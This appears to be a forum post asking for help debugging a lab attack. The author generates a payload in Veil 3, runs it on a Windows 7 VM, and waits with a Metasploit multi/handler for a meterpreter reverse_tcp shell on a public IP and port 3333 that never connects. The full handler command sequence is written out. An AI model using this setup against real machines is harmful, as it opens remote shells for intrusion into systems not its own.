This is how I am generating the payload in Veil 3
> use XX
> set LHOST X.X.X.X
> set LPORT 3333
> generate
The payload generates successfully and transferred to victim machine Win7 SP1 VM
running no antivirus of any sort.
While on metasploit end
> msfconsole
> use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST X.X.X.X
> set LPORT 3333
> set ExitOnSession false
> exploit
X.X.X.X
is a public IP.
While running this I get stuck to following and nothing happens
[*] Started reverse TCP handler on X.X.X.X:3333
Where am I going wrong. What could be the issue here. I have allowed port 3333 in ufw
and no other services are listening to that port.
Also after running the payload on victim machine and doing netstat
gives me no instance of port 3333 communicating to X.X.X.X.